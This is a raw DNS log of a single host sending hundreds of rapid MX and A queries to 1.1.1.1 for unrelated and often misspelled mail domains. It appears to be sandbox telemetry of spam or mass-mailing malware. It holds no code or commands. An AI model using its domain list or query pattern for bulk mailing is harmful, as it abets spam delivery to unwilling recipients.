Feb 21, 2024 00:26:01.321435928 CET	1.1.1.1	192.168.2.6	0xc0e4	Name error (3)	radiussystemllc.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.328015089 CET	1.1.1.1	192.168.2.6	0x2f58	Name error (3)	sq-community.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.329864979 CET	1.1.1.1	192.168.2.6	0xfcaf	Name error (3)	farma-aps.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.350737095 CET	1.1.1.1	192.168.2.6	0x57b7	Name error (3)	hotmail.fr.br	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.354664087 CET	1.1.1.1	192.168.2.6	0xb421	No error (0)	eyegage.com			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.354664087 CET	1.1.1.1	192.168.2.6	0xb421	No error (0)	eyegage.com			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.354664087 CET	1.1.1.1	192.168.2.6	0xb421	No error (0)	eyegage.com			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.354664087 CET	1.1.1.1	192.168.2.6	0xb421	No error (0)	eyegage.com			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.354664087 CET	1.1.1.1	192.168.2.6	0xb421	No error (0)	eyegage.com			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.357259035 CET	1.1.1.1	192.168.2.6	0x1c01	Name error (3)	scw-hotmail.de	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.358638048 CET	1.1.1.1	192.168.2.6	0xf482	Name error (3)	schupp-hotmail.de	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.359121084 CET	1.1.1.1	192.168.2.6	0xf829	Name error (3)	generika-apotheke-hotmail.de	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.363013029 CET	1.1.1.1	192.168.2.6	0x339	Name error (3)	terminatour-bohotmailing.de	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.370963097 CET	1.1.1.1	192.168.2.6	0x559	Name error (3)	tux4hotmail.de	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.372454882 CET	1.1.1.1	192.168.2.6	0xe093	Name error (3)	hotmail.demail.de	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.374763012 CET	1.1.1.1	192.168.2.6	0x7ef8	Name error (3)	utlohotmail.de	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.383100986 CET	1.1.1.1	192.168.2.6	0xba31	Name error (3)	lavera2.de	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.383477926 CET	1.1.1.1	192.168.2.6	0x8e3a	Name error (3)	undercover-bietigheim.de	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.390326023 CET	1.1.1.1	192.168.2.6	0x2484	Name error (3)	morr-hotmail.de	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.390860081 CET	1.1.1.1	192.168.2.6	0xa7a0	Name error (3)	hotmail.fr.tr	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.396362066 CET	1.1.1.1	192.168.2.6	0x955f	No error (0)	mwpmedia.com			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.409601927 CET	1.1.1.1	192.168.2.6	0xc113	No error (0)	braekling.de			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.409601927 CET	1.1.1.1	192.168.2.6	0xc113	No error (0)	braekling.de			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.409601927 CET	1.1.1.1	192.168.2.6	0xc113	No error (0)	braekling.de			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.409601927 CET	1.1.1.1	192.168.2.6	0xc113	No error (0)	braekling.de			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.409601927 CET	1.1.1.1	192.168.2.6	0xc113	No error (0)	braekling.de			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.417182922 CET	1.1.1.1	192.168.2.6	0x4409	No error (0)	touktoukcie.com			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.422214985 CET	1.1.1.1	192.168.2.6	0xb8e7	No error (0)	amsantechnology.com			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.422214985 CET	1.1.1.1	192.168.2.6	0xb8e7	No error (0)	amsantechnology.com			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.422214985 CET	1.1.1.1	192.168.2.6	0xb8e7	No error (0)	amsantechnology.com			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.422214985 CET	1.1.1.1	192.168.2.6	0xb8e7	No error (0)	amsantechnology.com			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.422214985 CET	1.1.1.1	192.168.2.6	0xb8e7	No error (0)	amsantechnology.com			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.423326969 CET	1.1.1.1	192.168.2.6	0x5b81	No error (0)	caspiantravel.co.uk			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.423326969 CET	1.1.1.1	192.168.2.6	0x5b81	No error (0)	caspiantravel.co.uk			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.425143003 CET	1.1.1.1	192.168.2.6	0x481b	No error (0)	network-abilities.com			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.425143003 CET	1.1.1.1	192.168.2.6	0x481b	No error (0)	network-abilities.com			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.442861080 CET	1.1.1.1	192.168.2.6	0x1873	No error (0)	art-paix-di.org			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.442861080 CET	1.1.1.1	192.168.2.6	0x1873	No error (0)	art-paix-di.org			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.442861080 CET	1.1.1.1	192.168.2.6	0x1873	No error (0)	art-paix-di.org			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.451220989 CET	1.1.1.1	192.168.2.6	0x997f	No error (0)	waukesha-water.com			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.461955070 CET	1.1.1.1	192.168.2.6	0x2f2f	No error (0)	wefttechnologies.com			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.461955070 CET	1.1.1.1	192.168.2.6	0x2f2f	No error (0)	wefttechnologies.com			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.461955070 CET	1.1.1.1	192.168.2.6	0x2f2f	No error (0)	wefttechnologies.com			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.461955070 CET	1.1.1.1	192.168.2.6	0x2f2f	No error (0)	wefttechnologies.com			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.461955070 CET	1.1.1.1	192.168.2.6	0x2f2f	No error (0)	wefttechnologies.com			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.468462944 CET	1.1.1.1	192.168.2.6	0xefd2	No error (0)	voltage-distribution.com			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.471571922 CET	1.1.1.1	192.168.2.6	0x116a	No error (0)	hotmail.fr.au			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.472882986 CET	1.1.1.1	192.168.2.6	0xfff1	No error (0)	29hotmail.de			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.472882986 CET	1.1.1.1	192.168.2.6	0xfff1	No error (0)	29hotmail.de			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.477961063 CET	1.1.1.1	192.168.2.6	0x501c	No error (0)	publichouse.ie			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.477961063 CET	1.1.1.1	192.168.2.6	0x501c	No error (0)	publichouse.ie			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.477961063 CET	1.1.1.1	192.168.2.6	0x501c	No error (0)	publichouse.ie			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.477961063 CET	1.1.1.1	192.168.2.6	0x501c	No error (0)	publichouse.ie			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.477961063 CET	1.1.1.1	192.168.2.6	0x501c	No error (0)	publichouse.ie			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.485821009 CET	1.1.1.1	192.168.2.6	0x5c3a	No error (0)	mhcosta.gotadsl.co.uk			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.485821009 CET	1.1.1.1	192.168.2.6	0x5c3a	No error (0)	mhcosta.gotadsl.co.uk			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.492424965 CET	1.1.1.1	192.168.2.6	0xefe1	No error (0)	imailzone.com			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.492455006 CET	1.1.1.1	192.168.2.6	0x15c3	No error (0)	ksv-schwimmen.de			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.494363070 CET	1.1.1.1	192.168.2.6	0xc6ad	No error (0)	popular.de			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.494363070 CET	1.1.1.1	192.168.2.6	0xc6ad	No error (0)	popular.de			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.494363070 CET	1.1.1.1	192.168.2.6	0xc6ad	No error (0)	popular.de			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.494363070 CET	1.1.1.1	192.168.2.6	0xc6ad	No error (0)	popular.de			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.494363070 CET	1.1.1.1	192.168.2.6	0xc6ad	No error (0)	popular.de			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.515014887 CET	1.1.1.1	192.168.2.6	0xcce6	No error (0)	wilsonfamilyinsurance.com			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.516069889 CET	1.1.1.1	192.168.2.6	0x755f	Name error (3)	esafrica.co.zw	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.519001961 CET	1.1.1.1	192.168.2.6	0x5312	Name error (3)	gamma.ocm.ne.jp	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.529762983 CET	1.1.1.1	192.168.2.6	0xfeed	No error (0)	d-brinkmann.de			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.530611038 CET	1.1.1.1	192.168.2.6	0xd44d	No error (0)	markoren.no			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.539804935 CET	1.1.1.1	192.168.2.6	0xc164	No error (0)	derbyron.de			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.542867899 CET	1.1.1.1	192.168.2.6	0x98e7	No error (0)	glazing-bt.com			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.560435057 CET	1.1.1.1	192.168.2.6	0x1729	Name error (3)	hotmail.fr.ar	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.561032057 CET	1.1.1.1	192.168.2.6	0xd402	Name error (3)	x-erfolgsteam.de	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.562958956 CET	1.1.1.1	192.168.2.6	0xb45f	No error (0)	collevilca.it			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.562958956 CET	1.1.1.1	192.168.2.6	0xb45f	No error (0)	collevilca.it			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.562958956 CET	1.1.1.1	192.168.2.6	0xb45f	No error (0)	collevilca.it			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.562958956 CET	1.1.1.1	192.168.2.6	0xb45f	No error (0)	collevilca.it			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.562958956 CET	1.1.1.1	192.168.2.6	0xb45f	No error (0)	collevilca.it			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.596406937 CET	1.1.1.1	192.168.2.6	0x1380	No error (0)	b4l-clan.de			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.600625038 CET	1.1.1.1	192.168.2.6	0x8973	No error (0)	sportclinic.co.il			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.600625038 CET	1.1.1.1	192.168.2.6	0x8973	No error (0)	sportclinic.co.il			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.600625038 CET	1.1.1.1	192.168.2.6	0x8973	No error (0)	sportclinic.co.il			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.600625038 CET	1.1.1.1	192.168.2.6	0x8973	No error (0)	sportclinic.co.il			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.600625038 CET	1.1.1.1	192.168.2.6	0x8973	No error (0)	sportclinic.co.il			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.625400066 CET	1.1.1.1	192.168.2.6	0x6a29	No error (0)	cdgcapitalbourse.ma			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.629158020 CET	1.1.1.1	192.168.2.6	0xcc2c	Name error (3)	igs-ruelzheim.rp.lo-net2.de	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.644598961 CET	1.1.1.1	192.168.2.6	0x35f6	No error (0)	cfca.eu			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.644598961 CET	1.1.1.1	192.168.2.6	0x35f6	No error (0)	cfca.eu			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.644598961 CET	1.1.1.1	192.168.2.6	0x35f6	No error (0)	cfca.eu			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.644598961 CET	1.1.1.1	192.168.2.6	0x35f6	No error (0)	cfca.eu			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.644598961 CET	1.1.1.1	192.168.2.6	0x35f6	No error (0)	cfca.eu			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.662765026 CET	1.1.1.1	192.168.2.6	0x1110	No error (0)	att.com.tw			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.687818050 CET	1.1.1.1	192.168.2.6	0x59cf	No error (0)	mlbx.matrix.jp			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.699810982 CET	1.1.1.1	192.168.2.6	0x3919	No error (0)	cpsgroupe.com			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.699810982 CET	1.1.1.1	192.168.2.6	0x3919	No error (0)	cpsgroupe.com			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.734302998 CET	1.1.1.1	192.168.2.6	0xc6ee	No error (0)	schussundtor.de			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.734302998 CET	1.1.1.1	192.168.2.6	0xc6ee	No error (0)	schussundtor.de			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.770663977 CET	1.1.1.1	192.168.2.6	0x472d	No error (0)	creativ-moebelwerkstaetten.de			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.284451962 CET	1.1.1.1	192.168.2.6	0xe86b	No error (0)	att.com.hk			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.284451962 CET	1.1.1.1	192.168.2.6	0xe86b	No error (0)	att.com.hk			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.463855028 CET	1.1.1.1	192.168.2.6	0x46aa	Name error (3)	jtirit.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.504713058 CET	1.1.1.1	192.168.2.6	0xeaf8	Name error (3)	outlook.fr.sg	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.504722118 CET	1.1.1.1	192.168.2.6	0xeaf8	Name error (3)	outlook.fr.sg	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.506534100 CET	1.1.1.1	192.168.2.6	0x3a88	Name error (3)	ptotonmail.ch	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.566591978 CET	1.1.1.1	192.168.2.6	0x613c	Name error (3)	smhotmaillang.de	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.582566023 CET	1.1.1.1	192.168.2.6	0xdb3c	Name error (3)	fos-elektronik.de	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.591308117 CET	1.1.1.1	192.168.2.6	0x6262	Name error (3)	gothic-concerts.de	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.592675924 CET	1.1.1.1	192.168.2.6	0x3192	No error (0)	att.com.au		15.197.204.56	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:02.592675924 CET	1.1.1.1	192.168.2.6	0x3192	No error (0)	att.com.au		3.33.243.145	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:02.601370096 CET	1.1.1.1	192.168.2.6	0x6bfb	No error (0)	aregods.com			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.632117033 CET	1.1.1.1	192.168.2.6	0xf7a6	No error (0)	gmcocorp.com			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.712830067 CET	1.1.1.1	192.168.2.6	0xb63b	No error (0)	m-viper.de			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.721290112 CET	1.1.1.1	192.168.2.6	0xc77b	No error (0)	netzschnipsel.de			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.721290112 CET	1.1.1.1	192.168.2.6	0xc77b	No error (0)	netzschnipsel.de			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.768225908 CET	1.1.1.1	192.168.2.6	0x8432	No error (0)	breecetechnology.co.za			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.768234968 CET	1.1.1.1	192.168.2.6	0x8432	No error (0)	breecetechnology.co.za			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.769766092 CET	1.1.1.1	192.168.2.6	0x9850	No error (0)	blauthlaw.com			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.770220995 CET	1.1.1.1	192.168.2.6	0x80d	Server failure (2)	att.in	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.840082884 CET	1.1.1.1	192.168.2.6	0x3aba	No error (0)	architettosangiorgio.ch			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.860850096 CET	1.1.1.1	192.168.2.6	0x17db	Name error (3)	homehotmail.de	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:02.879352093 CET	1.1.1.1	192.168.2.6	0xc64f	No error (0)	temxp.net			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:03.089323997 CET	1.1.1.1	192.168.2.6	0xc666	Name error (3)	rubypink.co.uk	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.094677925 CET	1.1.1.1	192.168.2.6	0x8526	Name error (3)	heinzerlinghotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.131155968 CET	1.1.1.1	192.168.2.6	0x4f23	No error (0)	joaz.de		188.40.92.90	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.141860008 CET	1.1.1.1	192.168.2.6	0x411d	Name error (3)	dancenight-express.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.142184973 CET	1.1.1.1	192.168.2.6	0xeee6	Name error (3)	farma-aps.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.143770933 CET	1.1.1.1	192.168.2.6	0x8c3f	Name error (3)	tux4hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.146151066 CET	1.1.1.1	192.168.2.6	0xd0bb	Name error (3)	newhotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.149626970 CET	1.1.1.1	192.168.2.6	0x43c5	Name error (3)	ptotonmail.ch	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.153724909 CET	1.1.1.1	192.168.2.6	0xaf1b	Name error (3)	zube-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.155320883 CET	1.1.1.1	192.168.2.6	0x62e4	Name error (3)	undercover-bietigheim.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.156749010 CET	1.1.1.1	192.168.2.6	0x5be9	No error (0)	pharmacie-vp.fr			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:03.156996965 CET	1.1.1.1	192.168.2.6	0x17a2	Name error (3)	gothic-concerts.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.159060955 CET	1.1.1.1	192.168.2.6	0x8f80	Name error (3)	kvapilova.net	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.160083055 CET	1.1.1.1	192.168.2.6	0xddda	Name error (3)	morr-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.168338060 CET	1.1.1.1	192.168.2.6	0xb9bf	No error (0)	glazing-bt.com		45.147.96.4	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.168371916 CET	1.1.1.1	192.168.2.6	0x7a9	Name error (3)	jtirit.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.172615051 CET	1.1.1.1	192.168.2.6	0x288c	Name error (3)	jalds.org	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.172622919 CET	1.1.1.1	192.168.2.6	0x9e73	No error (0)	gmcocorp.com		23.236.62.147	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.173263073 CET	1.1.1.1	192.168.2.6	0x1759	No error (0)	norwegischlernen.info		162.0.235.125	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.174675941 CET	1.1.1.1	192.168.2.6	0x921b	No error (0)	att.com.sg		20.75.101.58	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.178596020 CET	1.1.1.1	192.168.2.6	0x97da	No error (0)	mwpmedia.com		198.185.159.145	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.178596020 CET	1.1.1.1	192.168.2.6	0x97da	No error (0)	mwpmedia.com		198.49.23.144	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.178596020 CET	1.1.1.1	192.168.2.6	0x97da	No error (0)	mwpmedia.com		198.49.23.145	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.178596020 CET	1.1.1.1	192.168.2.6	0x97da	No error (0)	mwpmedia.com		198.185.159.144	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.182363033 CET	1.1.1.1	192.168.2.6	0x8f1a	Name error (3)	hotmailhome.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.189723969 CET	1.1.1.1	192.168.2.6	0xca6f	No error (0)	fortressrealcapital.com		104.21.54.169	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.189723969 CET	1.1.1.1	192.168.2.6	0xca6f	No error (0)	fortressrealcapital.com		172.67.140.174	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.193439960 CET	1.1.1.1	192.168.2.6	0x90a0	Name error (3)	fos-elektronik.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.198595047 CET	1.1.1.1	192.168.2.6	0x8432	No error (0)	netzschnipsel.de		217.160.122.119	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.198770046 CET	1.1.1.1	192.168.2.6	0xccbb	No error (0)	montessorihawaii.org		185.230.63.186	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.198770046 CET	1.1.1.1	192.168.2.6	0xccbb	No error (0)	montessorihawaii.org		185.230.63.107	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.198770046 CET	1.1.1.1	192.168.2.6	0xccbb	No error (0)	montessorihawaii.org		185.230.63.171	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.204540014 CET	1.1.1.1	192.168.2.6	0x750a	Name error (3)	scw-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.206552982 CET	1.1.1.1	192.168.2.6	0x6f4c	Name error (3)	schupp-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.208616972 CET	1.1.1.1	192.168.2.6	0xd3e4	Name error (3)	radiussystemllc.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.208628893 CET	1.1.1.1	192.168.2.6	0x392a	No error (0)	strategicimpact.com.au			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:03.208628893 CET	1.1.1.1	192.168.2.6	0x392a	No error (0)	strategicimpact.com.au			MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:03.210135937 CET	1.1.1.1	192.168.2.6	0x4008	Name error (3)	generika-apotheke-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.210943937 CET	1.1.1.1	192.168.2.6	0x639	Server failure (2)	att.in	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.213002920 CET	1.1.1.1	192.168.2.6	0x259c	No error (0)	eyegage.com		75.2.70.75	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.215508938 CET	1.1.1.1	192.168.2.6	0xd603	Name error (3)	hotmail.fr.br	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.216501951 CET	1.1.1.1	192.168.2.6	0xd92a	No error (0)	amsantechnology.com		13.232.255.130	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.220287085 CET	1.1.1.1	192.168.2.6	0xa2	Name error (3)	lavera2.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.221223116 CET	1.1.1.1	192.168.2.6	0x21ab	Name error (3)	igs-ruelzheim.rp.lo-net2.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.223113060 CET	1.1.1.1	192.168.2.6	0x6438	Name error (3)	sq-community.com	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.224087000 CET	1.1.1.1	192.168.2.6	0x75b0	Name error (3)	utlohotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.227313995 CET	1.1.1.1	192.168.2.6	0xf497	Name error (3)	hotmail-topmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.228426933 CET	1.1.1.1	192.168.2.6	0xf133	No error (0)	cfgteam.com		3.33.130.190	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.228426933 CET	1.1.1.1	192.168.2.6	0xf133	No error (0)	cfgteam.com		15.197.148.33	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.229487896 CET	1.1.1.1	192.168.2.6	0x57d9	No error (0)	d-brinkmann.de		81.169.145.143	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.230525017 CET	1.1.1.1	192.168.2.6	0x1c7b	Name error (3)	terminatour-bohotmailing.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.231533051 CET	1.1.1.1	192.168.2.6	0x3627	Name error (3)	smhotmaillang.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.232187033 CET	1.1.1.1	192.168.2.6	0xaca9	Name error (3)	runyai-hotmail.de	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:03.233546019 CET	1.1.1.1	192.168.2.6	0xacff	Name error (3)	hotmailjoy.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.235644102 CET	1.1.1.1	192.168.2.6	0x3dbd	Name error (3)	x-erfolgsteam.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.238125086 CET	1.1.1.1	192.168.2.6	0x225d	Name error (3)	spd-hotmail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.238732100 CET	1.1.1.1	192.168.2.6	0xa98a	Name error (3)	hotmail.demail.de	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.239202023 CET	1.1.1.1	192.168.2.6	0x3387	Name error (3)	imao.ml	none	none	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:03.239506006 CET	1.1.1.1	192.168.2.6	0x552	Name error (3)	hotmail.fr.tr	none	none	A (IP address)	IN (0x0001)	false
